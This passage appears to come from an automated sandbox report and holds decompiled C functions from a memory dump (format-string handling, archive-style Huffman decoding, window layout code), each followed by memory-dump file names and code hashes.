          												_t127 = 0x30;
          												__eflags = _t64;
          												if(_t64 != 0) {
          													L57:
          													_t65 = 0x58;
          													 *((short*)(_t135 + _t102 * 2 - 0xc)) = _t127;
          													__eflags = _t111 - _t65;
          													if(_t111 == _t65) {
          														L60:
          														_t66 = 1;
          														L61:
          														__eflags = _t66;
          														asm("cbw");
          														 *((short*)(_t135 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
          														_t102 = _t102 + 2;
          														__eflags = _t102;
          														L62:
          														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t102;
          														__eflags = _t124 & 0x0000000c;
          														if((_t124 & 0x0000000c) == 0) {
          															E002131B0(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
          															_t136 = _t136 + 0x10;
          														}
          														E00214C36(_t134 + 0x448,  &_v16, _t102, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
          														_t113 =  *(_t134 + 0x20);
          														_t103 = _t134 + 0x18;
          														_t75 = _t113 >> 3;
          														__eflags = _t75 & 0x00000001;
          														if((_t75 & 0x00000001) != 0) {
          															_t115 = _t113 >> 2;
          															__eflags = _t115 & 0x00000001;
          															if((_t115 & 0x00000001) == 0) {
          																E002131B0(_t134 + 0x448, 0x30, _t130, _t103);
          																_t136 = _t136 + 0x10;
          															}
          														}
          														E00214B18(_t134, 0);
          														__eflags =  *_t103;
          														if( *_t103 >= 0) {
          															_t78 =  *(_t134 + 0x20) >> 2;
          															__eflags = _t78 & 0x00000001;
          															if((_t78 & 0x00000001) != 0) {
          																E002131B0(_t134 + 0x448, 0x20, _t130, _t103);
          															}
          														}
          														goto L71;
          													}
          													_t86 = 0x41;
          													__eflags = _t111 - _t86;
          													if(_t111 == _t86) {
          														goto L60;
          													}
          													_t66 = 0;
          													goto L61;
          												}
          												__eflags = _t64;
          												if(_t64 == 0) {
          													goto L62;
          												}
          												goto L57;
          											}
          											_t132 = 0x41;
          											__eflags = _t111 - _t132;
          											if(_t111 == _t132) {
          												goto L54;
          											}
          											_t64 = 0;
          											goto L55;
          										}
          										goto L51;
          									}
          									_t88 = 0x58;
          									__eflags = _t111 - _t88;
          									if(_t111 != _t88) {
          										goto L50;
          									}
          									goto L48;
          								}
          								_t90 = _t124 >> 6;
          								__eflags = 1 & _t90;
          								if((1 & _t90) == 0) {
          									__eflags = 1 & _t124;
          									if((1 & _t124) == 0) {
          										_t92 = _t124 >> 1;
          										__eflags = 1 & _t92;
          										if((1 & _t92) == 0) {
          											goto L46;
          										}
          										_v16 = _t126;
          										L45:
          										_t102 = 1;
          										goto L46;
          									}
          									_push(0x2b);
          									L40:
          									_pop(_t93);
          									_v16 = _t93;
          									goto L45;
          								}
          								_push(0x2d);
          								goto L40;
          							}
          							L11:
          							_t57 = 0;
          							goto L72;
          						}
          						_t95 = _t55;
          						__eflags = _t95;
          						if(__eflags == 0) {
          							L28:
          							_push(_t102);
          							_push(0xa);
          							L29:
          							_t56 = E002146B3(_t134, _t125, __eflags);
          							goto L10;
          						}
          						__eflags = _t95 - 3;
          						if(__eflags != 0) {
          							goto L11;
          						}
          						_push(0);
          						L13:
          						_push(0x10);
          						goto L29;
          					}
          					if(__eflags == 0) {
          						_t56 = E00214890(__ecx);
          						goto L10;
          					}
          					__eflags = _t54 - 0x67;
          					if(_t54 <= 0x67) {
          						L30:
          						_t56 = E00214419(_t102, _t134);
          						goto L10;
          					}
          					__eflags = _t54 - 0x69;
          					if(_t54 == 0x69) {
          						L27:
          						_t3 = _t134 + 0x20;
          						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
          						__eflags =  *_t3;
          						goto L28;
          					}
          					__eflags = _t54 - 0x6e;
          					if(_t54 == 0x6e) {
          						_t56 = E002147FD(__ecx, _t123);
          						goto L10;
          					}
          					__eflags = _t54 - 0x6f;
          					if(_t54 != 0x6f) {
          						goto L11;
          					}
          					_t56 = E00214871(__ecx);
          					goto L10;
          				}
          				if(_t138 == 0) {
          					goto L27;
          				}
          				_t139 = _t54 - _t105;
          				if(_t139 > 0) {
          					_t97 = _t54 - 0x5a;
          					__eflags = _t97;
          					if(_t97 == 0) {
          						_t56 = E0021425C(__ecx);
          						goto L10;
          					}
          					_t98 = _t97 - 7;
          					__eflags = _t98;
          					if(_t98 == 0) {
          						goto L30;
          					}
          					__eflags = _t98;
          					if(__eflags != 0) {
          						goto L11;
          					}
          					L17:
          					_t56 = E0021461B(_t134, __eflags, _t102);
          					goto L10;
          				}
          				if(_t139 == 0) {
          					_push(1);
          					goto L13;
          				}
          				if(_t54 == _t123) {
          					goto L30;
          				}
          				if(_t54 == 0x43) {
          					goto L17;
          				}
          				if(_t54 <= 0x44) {
          					goto L11;
          				}
          				if(_t54 <= 0x47) {
          					goto L30;
          				}
          				if(_t54 != 0x53) {
          					goto L11;
          				}
          				goto L9;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 02cbe3250c2021e51a47e6eace4b1037676e5e27ed8fe358fd9626fb0128107f
          • Instruction ID: 9d87973afb6e597b20717d7061ede01a675151bf7da06f4c9147f8f148d8316f
          • Opcode Fuzzy Hash: 02cbe3250c2021e51a47e6eace4b1037676e5e27ed8fe358fd9626fb0128107f
          • Instruction Fuzzy Hash: 2C619971A3070A66CE38ED288851BFE23E6EB75704F10051AEA4FCB9C1D6519FF78651
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 72%
          			E0020397F(void* __ecx) {
          				signed int _t71;
          				signed int _t72;
          				signed int _t73;
          				signed int _t76;
          				signed int _t77;
          				signed int _t78;
          				signed int _t90;
          				signed int _t94;
          				signed int _t109;
          				intOrPtr* _t111;
          				signed int _t114;
          				intOrPtr _t115;
          				signed int _t121;
          				signed int _t124;
          				signed int _t125;
          				signed int _t131;
          				signed int _t133;
          				void* _t135;
          				signed int _t138;
          				intOrPtr* _t139;
          				intOrPtr* _t150;
          				void* _t151;
          				signed int _t154;
          				unsigned int _t159;
          				signed int _t162;
          				signed int _t164;
          				signed int _t165;
          				intOrPtr* _t168;
          				void* _t170;
          				void* _t171;
          
          				_t170 = __ecx;
          				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
          					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
          					__eflags =  *((char*)(_t168 + 8));
          					if( *((char*)(_t168 + 8)) != 0) {
          						L5:
          						_t164 = 0;
          						__eflags = 0;
          						do {
          							_t109 = E001FA4E8(_t168) >> 0x0000000c & 0x000000ff;
          							E001FA4D1(_t168, 4);
          							__eflags = _t109 - 0xf;
          							if(_t109 != 0xf) {
          								 *(_t171 + _t164 + 0x18) = _t109;
          								goto L14;
          							}
          							_t124 = E001FA4E8(_t168) >> 0x0000000c & 0x000000ff;
          							E001FA4D1(_t168, 4);
          							__eflags = _t124;
          							if(_t124 != 0) {
          								_t125 = _t124 + 2;
          								__eflags = _t125;
          								while(1) {
          									_t125 = _t125 - 1;
          									__eflags = _t164 - 0x14;
          									if(_t164 >= 0x14) {
          										break;
          									}
          									 *(_t171 + _t164 + 0x18) = 0;
          									_t164 = _t164 + 1;
          									__eflags = _t125;
          									if(_t125 != 0) {
          										continue;
          									}
          									break;
          								}
          								_t164 = _t164 - 1;
          								goto L14;
          							}
          							 *(_t171 + _t164 + 0x18) = 0xf;
          							L14:
          							_t164 = _t164 + 1;
          							__eflags = _t164 - 0x14;
          						} while (_t164 < 0x14);
          						_push(0x14);
          						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
          						_push(_t111);
          						_push(_t171 + 0x18);
          						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
          						E00202C88();
          						_t165 = 0;
          						__eflags = 0;
          						do {
          							__eflags =  *((char*)(_t168 + 8));
          							if( *((char*)(_t168 + 8)) != 0) {
          								L19:
          								_t71 = E001FA4ED(_t168);
          								_t72 =  *(_t111 + 0x84);
          								_t159 = _t71 & 0x0000fffe;
          								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
          								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
          									_t131 = 0xf;
          									_t73 = _t72 + 1;
          									 *(_t171 + 0x10) = _t131;
          									__eflags = _t73 - _t131;
          									if(_t73 >= _t131) {
          										L27:
          										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
          										 *_t168 =  *_t168 + (_t133 >> 3);
          										_t76 =  *(_t171 + 0x10);
          										 *(_t168 + 4) = _t133 & 0x00000007;
          										_t135 = 0x10;
          										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
          										__eflags = _t138 -  *_t111;
          										asm("sbb eax, eax");
          										_t77 = _t76 & _t138;
          										__eflags = _t77;
          										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
          										L28:
          										__eflags = _t78 - 0x10;
          										if(_t78 >= 0x10) {
          											_t139 = _t168;
          											__eflags = _t78 - 0x12;
          											if(__eflags >= 0) {
          												if(__eflags != 0) {
          													_t114 = (E001FA4E8(_t139) >> 9) + 0xb;
          													__eflags = _t114;
          													_push(7);
          												} else {
          													_t114 = (E001FA4E8(_t139) >> 0xd) + 3;
          													_push(3);
          												}
          												E001FA4D1(_t168);
          												while(1) {
          													_t114 = _t114 - 1;
          													__eflags = _t165 - 0x1ae;
          													if(_t165 >= 0x1ae) {
          														goto L46;
          													}
          													 *(_t171 + _t165 + 0x2c) = 0;
          													_t165 = _t165 + 1;
          													__eflags = _t114;
          													if(_t114 != 0) {
          														continue;
          													}
          													L44:
          													_t111 =  *((intOrPtr*)(_t171 + 0x14));
          													goto L45;
          												}
          												break;
          											}
          											__eflags = _t78 - 0x10;
          											if(_t78 != 0x10) {
          												_t121 = (E001FA4E8(_t139) >> 9) + 0xb;
          												__eflags = _t121;
          												_push(7);
          											} else {
          												_t121 = (E001FA4E8(_t139) >> 0xd) + 3;
          												_push(3);
          											}
          											E001FA4D1(_t168);
          											__eflags = _t165;
          											if(_t165 == 0) {
          												L48:
          												_t90 = 0;
          												L50:
          												L51:
          												return _t90;
          											} else {
          												while(1) {
          													_t121 = _t121 - 1;
          													__eflags = _t165 - 0x1ae;
          													if(_t165 >= 0x1ae) {
          														goto L46;
          													}
          													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
          													_t165 = _t165 + 1;
          													__eflags = _t121;
          													if(_t121 != 0) {
          														continue;
          													}
          													goto L44;
          												}
          												break;
          											}
          										}
          										 *(_t171 + _t165 + 0x2c) = _t78;
          										_t165 = _t165 + 1;
          										goto L45;
          									}
          									_t150 = _t111 + (_t73 + 1) * 4;
          									while(1) {
          										__eflags = _t159 -  *_t150;
          										if(_t159 <  *_t150) {
          											break;
          										}
          										_t73 = _t73 + 1;
          										_t150 = _t150 + 4;
          										__eflags = _t73 - 0xf;
          										if(_t73 < 0xf) {
          											continue;
          										}
          										goto L27;
          									}
          									 *(_t171 + 0x10) = _t73;
          									goto L27;
          								}
          								_t151 = 0x10;
          								_t162 = _t159 >> _t151 - _t72;
          								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
          								 *_t168 =  *_t168 + (_t154 >> 3);
          								 *(_t168 + 4) = _t154 & 0x00000007;
          								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
          								goto L28;
          							}
          							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
          							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
          								goto L19;
          							}
          							_t94 = E00204422(_t170);
          							__eflags = _t94;
          							if(_t94 == 0) {
          								goto L48;
          							}
          							goto L19;
          							L45:
          							__eflags = _t165 - 0x1ae;
          						} while (_t165 < 0x1ae);
          						L46:
          						 *((char*)(_t170 + 0xe662)) = 1;
          						__eflags =  *((char*)(_t168 + 8));
          						if( *((char*)(_t168 + 8)) != 0) {
          							L49:
          							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
          							_push(0x132);
          							_push(_t115);
          							_push(_t171 + 0x2c);
          							E00202C88();
          							_push(0x40);
          							_push(_t115 + 0xeec);
          							_push(_t171 + 0x166);
          							E00202C88();
          							_push(0x10);
          							_push(_t115 + 0x1dd8);
          							_push(_t171 + 0x1a6);
          							E00202C88();
          							_push(0x2c);
          							_push(_t115 + 0x2cc4);
          							_push(_t171 + 0x1b6);
          							E00202C88();
          							_t90 = 1;
          							goto L50;
          						}
          						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
          						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
          							goto L49;
          						}
          						goto L48;
          					}
          					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
          					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
          						goto L5;
          					}
          					_t90 = E00204422(__ecx);
          					__eflags = _t90;
          					if(_t90 == 0) {
          						goto L51;
          					}
          					goto L5;
          				}
          				return 1;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
          • Instruction ID: e6a1462573cb2706da659c444f0033882b840f76abfc46a318fad34ea6152b50
          • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
          • Instruction Fuzzy Hash: 72714C713243468BDB34DF28C8D4B7D7798ABA1308F44492DEAC68B2C3CBB49A95C751
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 88%
          			E00213CBA(void* __ecx) {
          				char _v6;
          				char _v8;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				char _t49;
          				signed int _t50;
          				void* _t51;
          				signed char _t54;
          				signed char _t56;
          				signed int _t57;
          				signed int _t58;
          				signed char _t67;
          				signed char _t69;
          				signed char _t71;
          				signed char _t80;
          				signed char _t82;
          				signed int _t84;
          				signed int _t86;
          				signed int _t87;
          				signed char _t92;
          				void* _t95;
          				intOrPtr _t100;
          				unsigned int _t102;
          				signed char _t104;
          				void* _t112;
          				unsigned int _t113;
          				void* _t114;
          				signed int _t115;
          				signed int* _t116;
          				void* _t119;
          				void* _t121;
          				void* _t122;
          				void* _t124;
          				void* _t125;
          
          				_push(__ecx);
          				_t119 = __ecx;
          				_t92 = 1;
          				_t49 =  *((char*)(__ecx + 0x31));
          				_t124 = _t49 - 0x64;
          				if(_t124 > 0) {
          					__eflags = _t49 - 0x70;
          					if(__eflags > 0) {
          						_t50 = _t49 - 0x73;
          						__eflags = _t50;
          						if(_t50 == 0) {
          							L9:
          							_t51 = E002148A8(_t119);
          							L10:
          							if(_t51 != 0) {
          								__eflags =  *((char*)(_t119 + 0x30));
          								if( *((char*)(_t119 + 0x30)) == 0) {
          									_t113 =  *(_t119 + 0x20);
          									_push(_t114);
          									_v8 = 0;
          									_t115 = 0;
          									_v6 = 0;
          									_t54 = _t113 >> 4;
          									__eflags = _t92 & _t54;
          									if((_t92 & _t54) == 0) {
          										L46:
          										_t100 =  *((intOrPtr*)(_t119 + 0x31));
          										__eflags = _t100 - 0x78;
          										if(_t100 == 0x78) {
          											L48:
          											_t56 = _t113 >> 5;
          											__eflags = _t92 & _t56;
          											if((_t92 & _t56) != 0) {
          												L50:
          												__eflags = _t100 - 0x61;
          												if(_t100 == 0x61) {
          													L53:
          													_t57 = 1;
          													L54:
          													__eflags = _t92;
          													if(_t92 != 0) {
          														L56:
          														 *((char*)(_t121 + _t115 - 4)) = 0x30;
          														__eflags = _t100 - 0x58;
          														if(_t100 == 0x58) {
          															L59:
          															_t58 = 1;
          															L60:
          															__eflags = _t58;
          															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
          															_t115 = _t115 + 2;
          															__eflags = _t115;
          															L61:
          															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
          															__eflags = _t113 & 0x0000000c;
          															if((_t113 & 0x0000000c) == 0) {
          																E00213184(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
          																_t122 = _t122 + 0x10;
          															}
          															E00214BA3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
          															_t102 =  *(_t119 + 0x20);
          															_t116 = _t119 + 0x18;
          															_t67 = _t102 >> 3;
          															__eflags = _t67 & 0x00000001;
          															if((_t67 & 0x00000001) != 0) {
          																_t104 = _t102 >> 2;
          																__eflags = _t104 & 0x00000001;
          																if((_t104 & 0x00000001) == 0) {
          																	E00213184(_t119 + 0x448, 0x30, _t95, _t116);
          																	_t122 = _t122 + 0x10;
          																}
          															}
          															E00214A71(_t95, _t119, _t116, _t119, 0);
          															__eflags =  *_t116;
          															if( *_t116 >= 0) {
          																_t71 =  *(_t119 + 0x20) >> 2;
          																__eflags = _t71 & 0x00000001;
          																if((_t71 & 0x00000001) != 0) {
          																	E00213184(_t119 + 0x448, 0x20, _t95, _t116);
          																}
          															}
          															_t69 = 1;
          															L70:
          															return _t69;
          														}
          														__eflags = _t100 - 0x41;
          														if(_t100 == 0x41) {
          															goto L59;
          														}
          														_t58 = 0;
          														goto L60;
          													}
          													__eflags = _t57;
          													if(_t57 == 0) {
          														goto L61;
          													}
          													goto L56;
          												}
          												__eflags = _t100 - 0x41;
          												if(_t100 == 0x41) {
          													goto L53;
          												}
          												_t57 = 0;
          												goto L54;
          											}
          											L49:
          											_t92 = 0;
          											__eflags = 0;
          											goto L50;
          										}
          										__eflags = _t100 - 0x58;
          										if(_t100 != 0x58) {
          											goto L49;
          										}
          										goto L48;
          									}
          									_t80 = _t113 >> 6;
          									__eflags = _t92 & _t80;
          									if((_t92 & _t80) == 0) {
          										__eflags = _t92 & _t113;
          										if((_t92 & _t113) == 0) {
          											_t82 = _t113 >> 1;
          											__eflags = _t92 & _t82;
          											if((_t92 & _t82) == 0) {
          												goto L46;
          											}
          											_v8 = 0x20;
          											L45:
          											_t115 = _t92;
          											goto L46;
          										}
          										_v8 = 0x2b;
          										goto L45;
          									}
          									_v8 = 0x2d;
          									goto L45;
          								}
          								_t69 = _t92;
          								goto L70;
          							}
          							L11:
          							_t69 = 0;
          							goto L70;
          						}
          						_t84 = _t50;
          						__eflags = _t84;
          						if(__eflags == 0) {
          							L28:
          							_push(0);
          							_push(0xa);
          							L29:
          							_t51 = E002146B3(_t119, _t114, __eflags);
          							goto L10;
          						}
          						__eflags = _t84 - 3;
          						if(__eflags != 0) {
          							goto L11;
          						}
          						_push(0);
          						L13:
          						_push(0x10);
          						goto L29;
          					}
          					if(__eflags == 0) {
          						_t51 = E00214890(__ecx);
          						goto L10;
          					}
          					__eflags = _t49 - 0x67;
          					if(_t49 <= 0x67) {
          						L30:
          						_t51 = E002142BF(_t92, _t119);
          						goto L10;
          					}
          					__eflags = _t49 - 0x69;
          					if(_t49 == 0x69) {
          						L27:
          						_t2 = _t119 + 0x20;
          						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
          						__eflags =  *_t2;
          						goto L28;
          					}
          					__eflags = _t49 - 0x6e;
          					if(_t49 == 0x6e) {
          						_t51 = E002147FD(__ecx, _t112);
          						goto L10;
          					}
          					__eflags = _t49 - 0x6f;
          					if(_t49 != 0x6f) {
          						goto L11;
          					}
          					_t51 = E00214871(__ecx);
          					goto L10;
          				}
          				if(_t124 == 0) {
          					goto L27;
          				}
          				_t125 = _t49 - 0x58;
          				if(_t125 > 0) {
          					_t86 = _t49 - 0x5a;
          					__eflags = _t86;
          					if(_t86 == 0) {
          						_t51 = E002141F9(__ecx);
          						goto L10;
          					}
          					_t87 = _t86 - 7;
          					__eflags = _t87;
          					if(_t87 == 0) {
          						goto L30;
          					}
          					__eflags = _t87;
          					if(__eflags != 0) {
          						goto L11;
          					}
          					L17:
          					_t51 = E0021458B(_t92, _t119, __eflags, 0);
          					goto L10;
          				}
          				if(_t125 == 0) {
          					_push(1);
          					goto L13;
          				}
          				if(_t49 == 0x41) {
          					goto L30;
          				}
          				if(_t49 == 0x43) {
          					goto L17;
          				}
          				if(_t49 <= 0x44) {
          					goto L11;
          				}
          				if(_t49 <= 0x47) {
          					goto L30;
          				}
          				if(_t49 != 0x53) {
          					goto L11;
          				}
          				goto L9;
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
          • Instruction ID: d1715c4b04ecfaaad4a4098f86496d4b755436c44aba3b5c167135a07cb3432b
          • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
          • Instruction Fuzzy Hash: 1E514560630B4657DB38DD28A4967FF6BCB9F32704F280519D846CB282C655DFF68352
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b75e1f005c90f2ee28155d8a7daac4ff7dc93df0cb9d42f3ae0ce2650a7f898a
          • Instruction ID: 5209204e846b435a6bcecfc471b0be3144f992229f477d7ec516c94acc4ed5a4
          • Opcode Fuzzy Hash: b75e1f005c90f2ee28155d8a7daac4ff7dc93df0cb9d42f3ae0ce2650a7f898a
          • Instruction Fuzzy Hash: FE81BF9211A2E4AEC70A9F3D38A82F57FA24773341B1D44FAC5C9C72A3C1768658D722
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c48b338f0865ebf52c8054d329703e302ca3dbc735afef9bd6db5331297f51fe
          • Instruction ID: d54f3dfd0a9d2ca60774f6788abf0dd0b4cfdb86706962e679bea30a48a121a9
          • Opcode Fuzzy Hash: c48b338f0865ebf52c8054d329703e302ca3dbc735afef9bd6db5331297f51fe
          • Instruction Fuzzy Hash: 605135B1A083068BC748CF19D49059AF7E1FF88314F054A2EE889E7740DB34E959CB9A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
          • Instruction ID: 1fd2d1267363418b4b0f3c5b9d13b90051fd67de872e486a0ace961680f4059e
          • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
          • Instruction Fuzzy Hash: C631E7B161471A8FCB14DF28C85126ABBD0FF95300F44452DE9C9D7742C778EA19CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c5f3f2e1f5dd582b4f9dca5aa63d8e98c63384b2de0a85a7e65fdfc80582ab41
          • Instruction ID: d83afeaa52b1fdb6fe2b07ef24dc744612f5455ee128ce51afdc56a9da7b69cc
          • Opcode Fuzzy Hash: c5f3f2e1f5dd582b4f9dca5aa63d8e98c63384b2de0a85a7e65fdfc80582ab41
          • Instruction Fuzzy Hash: A421CB31A210255BCB18CF6DED9447A7761974630134A813BEB469F291C634E926D7D0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 75%
          			E001FD70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
          				struct HWND__* _v8;
          				short _v2048;
          				char _v2208;
          				char _v2288;
          				signed int _v2292;
          				char _v2300;
          				intOrPtr _v2304;
          				struct tagRECT _v2320;
          				intOrPtr _v2324;
          				intOrPtr _v2336;
          				struct tagRECT _v2352;
          				struct tagRECT _v2368;
          				signed int _v2376;
          				char _v2377;
          				intOrPtr _v2384;
          				intOrPtr _v2393;
          				void* __ebx;
          				void* __esi;
          				signed int _t96;
          				signed int _t104;
          				struct HWND__* _t106;
          				signed int _t119;
          				signed int _t134;
          				void* _t150;
          				void* _t155;
          				char _t156;
          				void* _t157;
          				signed int _t158;
          				intOrPtr _t160;
          				void* _t163;
          				void* _t169;
          				long _t170;
          				signed int _t174;
          				signed int _t185;
          				struct HWND__* _t186;
          				struct HWND__* _t187;
          				void* _t188;
          				void* _t191;
          				signed int _t192;
          				long _t193;
          				void* _t200;
          				int* _t201;
          				struct HWND__* _t202;
          				void* _t204;
          				void* _t205;
          				void* _t207;
          				void* _t209;
          				void* _t213;
          
          				_t202 = __ecx;
          				_v2368.bottom = __ecx;
          				E001F3E41( &_v2208, 0x50, L"$%s:", _a8);
          				_t207 =  &_v2368 + 0x10;
          				E002011FA( &_v2208,  &_v2288, 0x50);
          				_t96 = E00212BB0( &_v2300);
          				_t186 = _v8;
          				_t155 = 0;
          				_v2376 = _t96;
          				_t209 =  *0x22d5f4 - _t155; // 0x63
          				if(_t209 <= 0) {
          					L8:
          					_t156 = E001FCD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
          					_v2377 = _t156;
          					GetWindowRect(_t186,  &_v2352);
          					GetClientRect(_t186,  &(_v2320.top));
          					_t169 = _v2352.right - _v2352.left + 1;
          					_t104 = _v2320.bottom;
          					_t191 = _v2352.bottom - _v2352.top + 1;
          					_v2368.right = 0x64;
          					_t204 = _t191 - _v2304;
          					_v2368.bottom = _t169 - _t104;
          					if(_t156 == 0) {
          						L15:
